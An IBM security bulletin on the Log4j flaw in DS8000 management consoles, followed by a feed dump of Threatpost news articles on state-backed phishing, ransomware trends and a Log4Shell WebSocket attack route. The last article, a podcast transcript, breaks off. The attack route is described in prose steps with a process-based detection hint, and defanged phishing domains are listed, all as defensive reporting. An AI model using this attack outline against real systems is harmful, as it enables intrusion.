## Summary
The DS8000 Hardware Managment Console leverages Apache Log4j CVE-2021-44228, which is subject to a vulnerability and may allow remote attackers to execute local code on the system.
## Vulnerability Details
** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)
** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam.
CVSS Base score: 10
CVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score.
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
## Affected Products and Versions
Affected Product(s)| Version(s)
---|---
R9.1| 89.1x.0.0
R9.2| 89.2x.0.0
R8.5| 88.5x.x.x
## Remediation/Fixes
IBM strongly recommends addressing the vulnerability now.
All versions of the DS89000F and DS8880 are potentially impacted. Customers should either schedule Remote Code Load (RCL) via <https://www.ibm.com/support/pages/ibm-remote-code-load> or contact IBM support, and request that ICS CVE_2021_44228_v1.0 or CVE_2021_44228_v1.1 be applied to their systems
DS8900F systems at release 9.0 are impacted and must upgrade to R9.1 or above
* DS8900F systems below R9.1 SP 2 (89.12.8.0) must update to at least 89.12.8.0, and preferably to at least the recommend release (89.13.7.0 or 89.21.28.) before applying the ICS which updates the Log4j package to v2.17.0.
* DS8880 systems below R8.5 GA2 - (88.50.184.0) must update to at least 88.50.184.0 and preferably to at least the recommended release (88.58.3.0) before applying the ICS which updates the Log4j package to v2.17.0.
For the current recommended code releases, please see <https://www.ibm.com/support/pages/ds8000-code-recommendation>
## Workarounds and Mitigations
None
## Get Notified about Future Security Bulletins
Subscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.
### References
[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> "Link resides outside of ibm.com" )
[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> "Link resides outside of ibm.com" )
Off
## Related Information
[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>)
[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)
## Acknowledgement
## Change History
16 Dec 2021: Initial Publication
*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.
## Disclaimer
Review the [IBM security bulletin disclaimer and definitions](<https://www.ibm.com/support/pages/node/6610583#disclaimer>) regarding your responsibilities for assessing potential impact of security vulnerabilities to your environment.
## Document Location
Worldwide
[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\/TPS"},"Product":{"code":"SSHGBU","label":"IBM DS8900F"},"Component":"","Platform":[{"code":"PF041","label":"HMC"}],"Version":"89.x.x.x","Edition":"","Line of Business":{"code":"LOB26","label":"Storage"}},{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\/TPS"},"Product":{"code":"ST5GLJ","label":"DS8880"},"Component":"","Platform":[{"code":"PF041","label":"HMC"}],"Version":"88.x.x.x","Edition":"","Line of Business":{"code":"LOB26","label":"Storage"}}]
{"threatpost": [{"lastseen": "2022-03-09T15:37:46", "description": "While Russia is fighting a physical war on the ground against Ukraine, advanced persistent threat (APT) groups affiliated with or backing Vladimir Putin\u2019s government are ramping up phishing and other attacks against Ukrainian and European targets in cyberspace, Google is warning.\n\nResearchers from Google\u2019s Threat Analysis Group (TAG) have seen an increase in activity ranging \u201cfrom espionage to phishing campaigns\u201d from threat groups known as FancyBear/APT28 and Ghostwriter/UNC1151, Shane Huntley, director of software engineering at Google TAG, wrote in a [blog post](<https://blog.google/threat-analysis-group/update-threat-landscape-ukraine/>) published Monday. The former has been attributed to Russia\u2019s GRU intelligence agency, and the latter is an actor that Ukraine previously said is part of the Belarusian Ministry of Defense.\n\nMeanwhile, there have been a recent spate of distributed denial-of-service (DDoS) attacks against Ukrainian government sites, such as the Ministry of Foreign Affairs and the Ministry of Internal Affairs, as well as key services that help Ukrainians find information, such as Liveuamap, according to Google TAG.\n\nChina\u2019s Mustang Panda also has joined the fray, using the war in Ukraine to target European entities with lures related to the Ukrainian invasion in a recent phishing campaign. China\u2019s government is one of the few around the world backing Putin in the conflict.\n\n\u201cWe\u2019re sharing this information to help raise awareness among the security community and high risk users,\u201d Huntley wrote in the post.\n\n## **Phishing Flurry**\n\nFancy Bear, the APT behind attacks against the [2020 Tokyo Olympics](<https://threatpost.com/cyberattacks-sporting-anti-doping-orgs-as-2020-olympics-loom/149634/>) and [elections in the European Union](<https://threatpost.com/cybercriminals-impersonate-russian-apt-fancy-bear-to-launch-ddos-attacks/149578/>), most recently has been targeting users of ukr.net \u2013 owned by the Ukrainian media company URKNet \u2013 with \u201cseveral large credential phishing campaigns,\u201d Huntley wrote.\n\n\u201cThe phishing emails are sent from a large number of compromised accounts (non-Gmail/Google), and include links to attacker controlled domains,\u201d according to the post.\n\nIn two recent campaigns, TAG saw attackers using newly created Blogspot domains as the initial landing page, which then redirected targets to credential phishing pages. At this time, all known attacker-controlled Blogspot domains have been taken down, Huntley added.\n\nMeanwhile, Ghostwriter has conducted similarly motivated phishing campaigns over the past week against Polish and Ukrainian government and military organizations, according to Google TAG. The group also has been targeting webmail users from the following providers in the region: i.ua, meta.ua, rambler.ru, ukr.net, wp.pl and yandex.ru.\n\nGoogle TAG blocked a number of credential phishing domains that researchers observed during the campaigns through Google Safe Browsing, according to the post. Those domains included the following: accounts[.]secure-ua[.]website, i[.]ua-passport[.]top, login[.]creditals-email[.]space, post[.]mil-gov[.]space and verify[.]rambler-profile[.]site.\n\n## **Capitalizing on Conflict**\n\nNot to be outdone, China\u2019s Mustang Panda, aka Temp.Hex**,** HoneyMyte, TA416 or RedDelta, is using phishing lures related to the conflict in the Ukraine to target European organizations.\n\n\u201cTAG identified malicious attachments with file names such as [\u2018Situation at the EU borders with Ukraine.zip\u2019](<https://www.virustotal.com/gui/file/8a7fbafe9f3395272548e5aadeb1af07baeb65d7859e7a1560f580455d7b1fac/>) which contain an executable of the same name that is a basic downloader,\u201d Huntley explained in the post. When executed, the file downloads several additional files that install the final, malicious payload, according to TAG.\n\nWhile Huntley noted that targeted Europe represents a shift for the threat actor \u2013 which typically targets entities in Southeast Asia \u2013 Mustang Panda has been active against EU entities before, most notably targeting Rome\u2019s Vatican and Catholic Church-related organizations with [a spearphishing campaign](<https://threatpost.com/hackers-continue-cyberattacks-against-vatican-catholic-orgs/159306/>) in September 2020.\n\nTo mitigate the APT\u2019s latest phishing attacks, TAG has alerted relevant authorities of its findings, Huntley noted.\n\n## **Expanding DDoS Protection**\n\nAs APTs step up phishing attacks against Ukrainian targets, key government and service-oriented websites in the country also are facing a new barrage of DDoS attacks, as mentioned.\n\nAs these attacks are likely to continue, Google has expanded eligibility for [Project Shield](<https://projectshield.withgoogle.com/landing>), the company\u2019s free protection against DDoS attacks, to \u201cUkrainian government websites, embassies worldwide and other governments in close proximity to the conflict,\u201d Huntley wrote. More than 150 websites in Ukraine, including many news organizations, are currently using the service.\n\nProject Shield allows Google to absorb the bad traffic in a DDoS attack so the targeted organization can continue operating and defend against these attacks, according to the post. The company is recommending that eligible organizations[ register](<https://support.projectshield.withgoogle.com/s/?language=en_US>) for Project Shield in the wake of increased DDoS attack activity, Huntley wrote.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-09T14:07:55", "type": "threatpost", "title": "Russian APTs Furiously Phish Ukraine \u2013 Google", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-09T14:07:55", "id": "THREATPOST:751A0E2371F134F90F39C20AB70C1E2A", "href": "https://threatpost.com/russian-apts-phishing-ukraine-google/178819/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-23T17:38:38", "description": "What\u2019s old in ransomware is new again. Or, more accurately, never really went away.\n\nNew analysis shows that for a years-old malware, [WannaCry](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) is still a viciously active pest. The self-propagating ransomware [cryptoworm](<https://threatpost.com/meet-the-cryptoworm-the-future-of-ransomware/117330/>) that\u2019s been parasitizing victims since 2017 was the top most detected ransomware family by far in January 2022, researchers found.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\nOut of 10.5 million malware detections from Jan. 1 \u2013 30, WannaCry showed up in 43 percent, as shown in the chart below.\n\nThe runner-up at No. 2 was GandCrab, which showed up in 13 percent of detections, in spite of the ransomware-as-a-service (RaaS) gang having [hung up its spurs](<https://threatpost.com/gandcrab-ransomware-shutters/145267/>) way back in 2019 (though the gang [resurfaced](<https://threatpost.com/gandcrab-operators-resurface-revile-malware/148631/>) with REvil malware months later).\n\nWhat\u2019s up with zombie ransomwares, still pumping out infection attempts years after they (supposedly) said sayonara? It\u2019s attributable to \u201cautomatic campaigns that were never turned off,\u201d Bitdefender said.\n\nMartin Zugec, technical solutions director at Bitdefender, told Threatpost that there are multiple reasons why these old ransomware families are still visible in the company\u2019s telemetry. \u201cWhile the first inclination would be to attribute detections to false positives \u2013 for example, detections from malware collectors or testing systems of security researchers \u2013 we extensively process our data to exclude such false detections,\u201d he noted.\n\nThat leaves one possible explanation being \u201cmalicious websites that are still automatically spreading malicious samples,\u201d or what he called \u201cabandoware.\u201d\n\nAnother common reason is ransomware that similar code as one of the older ransomware families that\u2019s triggering detections, Zugec suggested: \u201cFor example, code sold to another ransomware group.\u201d\n\nAlternatively, it could be a competing group trying to \u201chijack\u201d the ransomware operation and collect the ransom, he added. Or, then again, it could be attributed to ransomware operators faking their business shutdowns, then coming back under a new name \u201cbut often using the same (or very similar) code,\u201d he said, with a relatively recent example of a resurrected group being [Cerber](<https://threatpost.com/ransomware-volumes-record-highs-2021/168327/>).\n\nThe newest numbers that show WannaCry and GandCrab refer to ransomware detections, mind you, as opposed to infections. As well, the number of detected ransomware families varies by month, \u201cdepending on the current ransomware campaigns in different countries\u201d according to Bitdefender\u2019s monthly [Threat Debrief](<https://businessinsights.bitdefender.com/bitdefender-threat-debrief-february-2022>), published Wednesday. In that report, the company said that researchers had identified 202 ransomware families in January.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22182951/Screen-Shot-2022-02-22-at-6.28.48-PM-e1645572658809.png>)\n\nTop 10 ransomware families detected in January 2022. Source: Bitdefender.\n\n## Who/What Felt the January Malware Chill\n\nBitdefender researchers spotted ransomware streaming in from 149 countries in January. The plague continues to spread around the world, but the United States is the malware\u2019s favorite haunt, accounting for 24 percent of detections: the most of any country. Canada was next up, at 15 percent.\n\n\u201cMany ransomware attacks continue to be opportunistic, and the size of population is correlated to the number of detections,\u201d according to the company\u2019s threat report.\n\nWith regards to most-targeted industries, at the top of the list was government, accounting for 26 percent of detections, followed by telecommunications at 24 percent, education and research at 24 percent, and technology, which trailed at 9 percent.\n\n## New FluBot & TeaBot Campaigns\n\nJanuary also brought two new mobile banking malware [campaigns](<https://www.bitdefender.com/blog/labs/new-flubot-and-teabot-global-malware-campaigns-discovered/>) serving up the banking trojans [FluBot and TeaBot](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>). Last month, Bitdefender researchers discovered a raft of active campaigns that were flooding Android devices with the trojans through smishing and malicious Google Play apps that targeted victims with fly-by attacks.\n\nAs Bitdefender Labs said last month, researchers intercepted more than 100,000 malicious SMS messages trying to distribute Flubot malware since the beginning of December.\n\nCybercrooks\u2019 zest for [mobile malware](<https://threatpost.com/gaming-banking-trojans-mobile-malware/178571/>) makes sense, given that \u201caccess to cryptocurrency trading and banking on devices makes mobile platforms an attractive target for cybercriminals,\u201d according to the report.\n\nA separate [report](<https://securelist.com/mobile-malware-evolution-2021/105876/>) on mobile malware, published by Kaspersky on Tuesday, documented a downward trend in the number of attacks on mobile users year over year from 2021 to 2021. However, the attacks, though less numerous, are \u201cmore sophisticated in terms of both malware functionality and vectors,\u201d according to Kaspersky.\n\nSome examples of banking trojans new tricks, as pointed out by Kaspersy: In 2021, the Fakecalls banker, which targets Korean mobile users, was upgraded to drop outgoing calls to the victim\u2019s bank and to play pre-recorded operator responses stored in the trojan\u2019s body. As well, the Sova banker, which steals[ cookies](<https://encyclopedia.kaspersky.com/glossary/cookie/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), is now enabling attackers to access a target\u2019s current session and personal mobile banking account without knowing the login credentials.\n\n## Most Detected Android Trojans\n\nMeanwhile, there\u2019s a growing laundry list of Android trojans with ever-more-creative ways to stick it to mobile users. Below is a chart of the Top 10 Android trojans Bitdefender detected in January, along with a list of what rudeness they can get up to.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22222604/Screen-Shot-2022-02-22-at-10.25.56-PM-e1645586858362.png>)\n\nTop 10 Android trojans. Source: Bitdefender.\n\n * **Downloader.DN** \u2013 Repacked applications taken from Google App Store and bundled with aggressive adware. Some adware downloads other malware variants.\n * **InfoStealer.XY** \u2013 Obfuscated applications that masquerade as mobile antiviruses. When the malware app is first run, it checks if there is any AV solution installed and it tricks the user to uninstall it. It exfiltrates sensitive data, downloads and installs other malware and displays adware.\n * **HiddenApp.AID** \u2013 Aggressive adware that impersonates adblock applications. When running for the first time, it asks permission to display on top of other apps. With this permission, the application can hide from the launcher.\n * **SpyAgent.DW \u2013 **Applications that exfiltrate sensitive data like SMS messages, call logs, contacts, or GPS location.\n * **SpyAgent.DW, EA** \u2013 Applications that exfiltrate sensitive data.\n * **Dropper.AIF \u2013 **Polymorphic applications that drop and install encrypted modules. After the first run, their icons are hidden from the launcher.\n * **Banker.XX \u2013 **Applications that impersonate Korean banking applications to record audio and video, collect sensitive information and upload it to a C&C server.\n * **Banker.XJ, YM \u2013 **Applications that drop and install encrypted modules. This trojan grants device admin privileges, and gains access to manage phone calls and text messages. After deploying, it maintains a connection with the C&C server to receive command and upload sensitive information. This detection includes variants of TeaBot and FluBot.\n * **Banker.VF **\u2013 Polymorphic applications that impersonate legit apps (Google, Facebook, Sagawa Express \u2026). Once installed, it locates banking applications installed on the device and tries to download a trojanized version from the C&C server.\n\n## Chipping Away Protection in App Stores\n\nUnfortunately for mobile users \u2013 the recipients of these newfangled trojans \u2013 it\u2019s not looking good for the mobile app behemoths\u2019 quests to secure their app stores, Bitdefender asserted.\n\n\u201cTight control over application approval by app store owners is the primary protection provided for mobile devices, but it\u2019s becoming insufficient and [challenged by authorities](<https://news.yahoo.com/app-store-crackdown-advances-110050109.html>) in Europe and the U.S. who have introduced legislation to open up the ecosystem,\u201d according to its report. Such regulation has been introduced in the United States, the European Union, the Republic of Korea, the Netherlands and elsewhere, as Microsoft noted in a Feb. 9 post titled [Adapting ahead of regulation: a principled approach to app stores](<https://blogs.microsoft.com/on-the-issues/2022/02/09/open-app-store-principles-activision-blizzard/>).\n\n.In that post, Microsoft President Brad Smith announced a new set of Open App Store Principles for the Microsoft Store on Windows as well as to the \u201cnext-generation marketplaces\u201d it plans to build for games.\n\nMicrosoft has spent a few decades dealing with antitrust rules, Smith pointed out. Change isn\u2019t easy, but it\u2019s not impossible to deal with countries\u2019 adoption of new tech regulation \u201cthat promotes competition while also protecting fundamental values like privacy and national and cyber security,\u201d he wrote.\n\n## App Stores: Too Big for Their Britches?\n\nAt this point, the big app stores are sprawling like Walmart on steroids, Bitdefender pointed out, making it ever tougher to police them for malware, adware or \u201criskware\u201d \u2013 i.e., legitimate apps that can turn into threats due to security vulnerability, software incompatibility or legal violations.\n\n\u201cApple\u2019s App Store is approaching five million applications, and the Google Play Store has close to three million which makes it unwieldy to control,\u201d Bitdefender researchers contended.\n\n\u201cWhile malicious applications are quickly removed after discovery by platform owners, they often have hundreds of thousands of downloads before they are flagged.\u201d they continued.\n\nA case in point is the Joker mobile malware: The [malware](<https://threatpost.com/malicious-joker-app-downloads-google-play/177139/>), which zaps victims with premium SMS charges, popped up yet again on Google Play last year, in a mobile app called Color Message. From there, it snuck into a jaw-dropping number of devices: more than a half-million downloads before the store collared it.\n\nExpect more of the same, Bitdefender predicted. \u201cWhether an open or closed ecosystem \u2013 mobile malware will only increase and additional layers of protection on top of the gatekeeper-app-store model is recommended as part of basic mobile hygiene,\u201d according to the report.\n\n022322 12:33 UPDATE: Added input from Bitdefender\u2019s Martin Zugec.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-23T14:00:22", "type": "threatpost", "title": "Creaky Old WannaCry, GandCrab Top the Ransomware Scene", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-23T14:00:22", "id": "THREATPOST:8601D6EF6AB3201E582A218391B19C3F", "href": "https://threatpost.com/wannacry-gandcrab-top-ransomware-scene/178589/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T21:55:20", "description": "Defenders will once again be busy beavers this weekend: There\u2019s an alternative attack vector for the ubiquitous Log4j [vulnerability](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>), which relies on a basic Javascript WebSocket connection to trigger remote code-execution (RCE) on servers locally, via drive-by compromise.\n\nIn other words, an exploit can affect services running as localhost in internal systems that are not exposed to any network.\n\nThat\u2019s according to researchers at Blumira, who noted that the discovery eviscerates the notion that Log4Shell attacks [are limited to](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) exposed vulnerable web servers.\n\n\u201cThis newly discovered attack vector means that anyone with a vulnerable Log4j version can be exploited through the path of a listening server on their machine, or local network through browsing to a website, and triggering the vulnerability,\u201d researchers said in a Friday note to Threatpost.\n\n* * *\n\n**Check out all of our Log4Shell coverage:**\n\n * [Relentless Log4j Attacks Include State Actors, Possible Worm](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>)\n * [What the Log4Shell Bug Means for SMBs: Experts Weigh In](<https://threatpost.com/log4shell-bug-smbs-experts/177021/>)\n * [How to Buy Precious Patching Time as Log4j Exploits Fly (Podcast)](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>)\n * [Apache\u2019s Fix for Log4Shell Can Lead to DoS Attacks](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>)\n * _[Where the Latest Log4Shell Attacks Are Coming From](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>)_\n * [Log4Shell Is Spawning Even Nastier Mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>)\n * [SAP Kicks Log4Shell Vulnerability Out of 20 Apps](<https://threatpost.com/sap-log4shell-vulnerability-apps/177069/>)\n * [Zero Day in Ubiquitous Apache Log4j Tool Under Active Attack](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)\n\n* * *\n\nThis means there are several new malicious use cases for an exploit, beyond the now-well-documented ability to open a shell with a single line of code to drop malware on internet-facing web servers.\n\n\u201c[New use cases include everything] from malvertisting to creating watering holes for drive-by attacks,\u201d said Matthew Warner, CTO and co-founder of Blumira, in a technical post.\n\n## **Using WebSockets for Malicious Gain**\n\nWebSockets enables communication between a web browser and web applications, like chats and alerting on websites. They generally allow the browser to quickly send data back and forth to these types of apps, but they\u2019re also used for host-fingerprinting and port-scanning.\n\nWarner explained in his posting that WebSockets is also fraught with security risk.\n\n\u201cWebSockets are not restricted by same-origin policies like a normal cross-domain HTTP request,\u201d he explained. \u201cThey expect the server itself to validate the origin of the request. While they are useful, they also introduce a fair amount of risk as they do not include many security controls to limit their utilization.\u201d\n\nIn the Log4j case, an attacker would make malicious requests via WebSockets to a potentially vulnerable localhost or local network server. The targets don\u2019t have to be exposed to the internet.\n\n\u201cWebSockets have previously been used for port-scanning internal systems, but this represents one of the first remote code execution exploits being relayed by WebSockets,\u201d said Jake Williams, co-founder and CTO at BreachQuest, via email. \u201cThis shouldn\u2019t change anyone\u2019s position on vulnerability management though. Organizations should be pushing to patch quickly and mitigate by preventing outbound connections from potentially vulnerable services where patching is not an option.\u201d\n\n## **Local Attack Scenario for Log4Shell**\n\n_Warner offered a detailed breakdown of his proof-of-concept (PoC) for the attack in [the posting](<https://www.blumira.com/analysis-log4shell-local-trigger/>); below is a truncated explanation._\n\n**Step 1: **From a watering-hole server with the affected Log4j2 vulnerability installed, an attacker would trigger a file path URL from the browser with a WebSocket connection. Blumira used a basic Javascript WebSocket connection in the PoC, but Warner noted that \u201cthis does not necessarily need to be localhost; WebSockets allow for connection to any IP and easily could iterate private IP space.\u201d\n\n**Step 2:** As the page loads, it will initiate a local WebSocket connection, connect to the vulnerable listening server, and connect out over an identified type of connection based on a Java Naming and Directory Interface (JNDI) connection string \u2013 a technique that\u2019s similar to WebSockets\u2019 localhost port-scanning used for fingerprinting hosts.\n\n**Step 3:** Once the victim\u2019s host connects to an open port to a local service or a service accessible to the host itself, an attacker can then drop an exploit string in path or parameters. \u201cWhen this happens, the vulnerable host calls out to the exploit server, loads the attacker\u2019s class, and executes it with java.exe as the parent process,\u201d according to Warner.\n\n## **Detection and Remediation**\n\nThe bad news is that this also a stealthy approach, according to the analysis: \u201cWebSocket connections within the host can be difficult to gain deep visibility into, which increases the complexity of detection for this attack.\u201d That\u2019s because WebSocket connections silently initiate when a webpage loads, with no direct control by the client itself. However, Warner noted that there are ways to get around this.\n\nTo detect a possible attack, Warner recommended looking for instances of \u201c.*/java.exe\u201d being used as the parent process for \u201ccmd.exe/powershell.exe.\u201d\n\n\u201cThis is potentially very noisy,\u201d Warner said.\n\nAnd finally, organizations should also make sure they\u2019re set up to detect the presence of Cobalt Strike, TrickBot and related common attacker tools.\n\nTo identify where Log4j is used within local environments, there are publicly available scanning scripts, researchers noted, to identify the libraries used locally. Here are two:\n\n * Windows PoSh \u2013 https://github.com/N-able/ScriptsAndAutomationPolicies/blob/master/Vulnerability%20-%20CVE-2021-44228%20(Log4j)/get-log4jrcevulnerability.ps1\n * Cross platform \u2013 https://github.com/hillu/local-log4j-vuln-scanner/releases\n\nTo mitigate the risk completely, organizations should update all local development efforts, internal applications and internet-facing environments to Log4j 2.16 ASAP, including any custom applications.\n\nIn the meantime, users can implement egress filtering, which can restrict the callback required for the actual exploit to land, and can use tools like [NoScript Java-blocker](<https://noscript.net/>) on untrusted external sites to avoid Javascript triggering WebSocket connections.\n\n\u201cThis news does mean that relying on web application firewalls, or other network defenses, is no longer an effective mitigation,\u201d John Bambenek, principal threat hunter at Netenrich, said via email. \u201cPatching remains the single most important step an organization can take.\u201d\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T17:43:43", "type": "threatpost", "title": "Brand-New Log4Shell Attack Vector Threatens Local Hosts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T17:43:43", "id": "THREATPOST:49177F7B5015CE94637C97F64C2D4138", "href": "https://threatpost.com/new-log4shell-attack-vector-local-hosts/177128/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T03:51:25", "description": "Information about nuclear plants and air force capabilities. Conti ransomware gang crooks [conjecturing](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>) that the National Security Agency (NSA) was maybe behind the mysterious, months-long [TrickBot](<https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/>) [lull](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>). [Doxxed data](<https://www.theregister.com/2022/03/02/russian_soldier_leaks/>) about 120K Russian soldiers.\n\nThose are just some of the sensitive, valuable data that\u2019s being hacked out of Russia in the [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) \u2013 a war that erupted [even before](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) the country invaded Ukraine.\n\n\u201cEveryone is so focused on Russia hacking the world, but the world has been hacking Russia\u2026. And dumping a lot of critical data on military, nuclear plants, etc.,\u201d said Vinny Troia, cybersecurity Ph.D. and founder of [ShadowByte](<https://shadowbyte.com/>), a dark web threat intelligence and cyber fraud investigations firm.\n\nHe\u2019s one of an untold number of experts on dark-web threat intelligence who\u2019ve been pouring over the intel that\u2019s been flooding out of practically every nook and cranny of the internet: data that\u2019s being posted on Twitter, Telegram and within the multiple dumps of insider knowledge about the Conti ransomware gang posted by the Ukrainian supporter ContiLeaks.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThat ongoing dump, which has included [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti and TrickBot, a decryptor (that doesn\u2019t help recent victims whose files have been encrypted by the Conti gang, unfortunately), and much more, stopped yesterday when the Conti gang shut down its Jabber servers, Troia told Threatpost on Wednesday.\n\nHe visited the Threatpost podcast to update us on the mountain of data about Russia that intelligence experts are now slogging through.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030222_Vinny_Troia_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>). Also, see below for a lightly edited transcript. \n\n\n## Lightly Edited Transcript\n\n**Lisa Vaas:** Listeners, welcome to the Threatpost podcast. My guest today is Vinny Troia, cybersecurity PhD and founder of ShadowByte, a dark web threat intelligence and cyber fraud investigations firm. Today, we\u2019re 